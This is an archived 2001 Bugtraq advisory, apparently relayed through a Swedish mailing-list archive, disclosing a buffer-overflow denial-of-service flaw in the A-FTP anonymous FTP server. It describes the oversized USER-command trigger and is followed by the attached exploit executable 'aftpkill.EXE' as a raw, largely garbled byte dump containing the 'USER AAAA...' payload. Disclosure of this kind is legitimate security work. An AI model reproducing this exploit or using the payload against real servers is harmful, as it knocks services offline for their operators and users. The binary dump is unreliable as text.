6655722 2001-06-21 16:26 +0200  /110 rader/ Cartel Informatique Security Research Labs <srl@cartel-info.fr>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-22  02:31  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17545>
Ärende: A-FTP Anonymous FTP Server Remote DoS attack Vulnerability
------------------------------------------------------------
A-FTP Anonymous FTP Server Remote DoS attack Vulnerability

Cartel Advisory Code:  CART-0102


Vendor Affected:

A-FTP Server - Eirik Helgeland 
softhead@online.no / softhead@x-stream.no


What It Is (from the author):
A free Unix Compatible Anonymous FTP server, running hidden from the
user.
Can be started from a floppy without changing any ini or registry
settings on the host 
machine.


Public Disclosure Date:
21-06-2001


Systems Affected:
a-FTP Anonymous FTP Server

Credits: 
Nicolas Brulez - Brulez@cartel-info.fr

Problem:

Cartel security team has found a buffer overflow in the A-FTP
anonymous FTP server, which means that an attacker can execute a
denial of service attack against it.  Once the big buffer has been
sent, the server is vulnerable.  Only one more connection is needed
to make the FTP service unavailable.


extra Notes: 

If noone tries to login before the attacker's logout, the server will
still work.  Here comes a fully working exploit given as a proof of
concept for educational purpose only.  This exploit has been fully
coded in Win32 assembly language.  Cartel security team can't be held
responsible for anything you do with this file.

Example: 

220 Anonymous FTP Server Ready
USER [buffer]


[buffer] is around 2048 characters. (more or less)
It now needs a connection in order to crash.
Something like a : "ftp ip" will do the trick.
result : FTP service is unavaiable.



Date of Vendor Notification:
20-6-2001

Status:  

Waiting answer from the author.

Fix: 
none yet.


Greetings to my friends at:

USSR, Hert,Vauban systems and qualys.


About:

Cartel is a company based in France, dedicated to Research about
network security and application security systems.


Security services provided are :

- Firewalls testing
- Network Penetration Testing
- Application Security Testing
- Data protecting
- Intrusion Detection systems
- Binary auditing
- Secured hosting
- Antivirus
- PKI
- VPN

Copyright (c) Cartel informatique Security Research LABS.
This Document is copyrighted.It can't be edited nor republished
without explicit consent of CARTEL LABS.


For more informations, feel free to contact us.

Cartel info security research labs
mail: srl@cartel-info.fr
http://securite.cartel-info.fr/  (french site)
(6655722) /Cartel Informatique Security Research Labs <srl@cartel-info.fr>/(Ombruten)
Bilaga (application/octet-stream) i text 6655723
6655723 2001-06-21 16:26 +0200  /13 rader/ Cartel Informatique Security Research Labs <srl@cartel-info.fr>
Bilagans filnamn: "aftpkill.EXE"
Importerad: 2001-06-22  02:31  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17546>
Bilaga (text/plain) till text 6655722
Ärende: Bilaga (aftpkill.EXE) till: A-FTP Anonymous FTP Server Remote DoS attack Vulnerability
------------------------------------------------------------
MZPÿÿ¸@º´	Í!¸LÍ!This program must be run under Win32
$7PELÔ*}ZàŽB @
€ `ºptCODE `DATA@ >
@À.idata`H@À.relocpJ@P3À3Û3Ò3É3ö3ÿ3íjõèö£\@èò‹ø¹ÿÿÿÿ2ÀWò®÷Ñ_° ò®I‹÷€>„€>„ˆ¿ä+@ó¤h@*@hèØ3ÀP@P@PèØ£Ü+@fÇÌ+@¸Pè¡f£Î+@hä+@è‹£Ð+@jhÌ+@ÿ5Ü+@è€Àt)`œjh\@j&hÄ[@ÿ5\@è%aéåfFéqÿÿÿ3ÀPhèhä,@ÿ5Ü+@è)hä,@è
`œjh\@Phä,@ÿ5\@è۝a`œjh\@jhê[@ÿ5\@辝aèÏPh­	h @ÿ5Ü+@èï3Àÿ5Ü+@èÖèéh@*@hèÈ3ÀP@P@PèÈ£Ü+@fÇÌ+@¸Pè‘f£Î+@hä+@è{jhÌ+@ÿ5Ü+@èuÿ5Ü+@èpèƒjè(`œjh\@h“h­)@ÿ5\@èaë×ÿ%„`@ÿ%ˆ`@ÿ%Œ`@ÿ%`@ÿ%”`@ÿ%˜`@ÿ%œ`@ÿ%¤`@ÿ%¨`@ÿ%¬`@ÿ%°`@ÿ%´`@ÿ%¸`@ÿ%¼`@ÿ%À`@ÿ%Ä`@USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
a-ftp Anonymous ftp server Denial of Service
by: Brulez Nicolas / Cartel Informatique

Usage: aftpkill HostIp
Example: aftpkill 212.165.45.6

error:
i can't connect to this host!
 Sending D.O.S code....
<`Ì`„`\`Ù`¤`æ`ö`aa*a6aFaXa`alata~aŒaša¢a¬aæ`ö`aa*a6aFaXa`alata~aŒaša¢a¬aKERNEL32.dllWSOCK32.dllWriteConsoleAŒExitProcessSGetProcAddress:GetModuleHandleA5lstrlenAhGetStdHandleÚGetCommandLineA?recv7inet_addr6htons(connect'closesocket!WSAStartupEsendJsocketWSACleanupt0H0O0j0q0„0‰0“0š0 0²0¹0¿0ß0å0ï0ý01	11 1&1=1C1P1_1z11”1™1¥1«1¶1Ð1Ú1à1ï1õ1û122
2222%2+21272=2C2I2
(6655723) /Cartel Informatique Security Research Labs <srl@cartel-info.fr>/(Ombruten)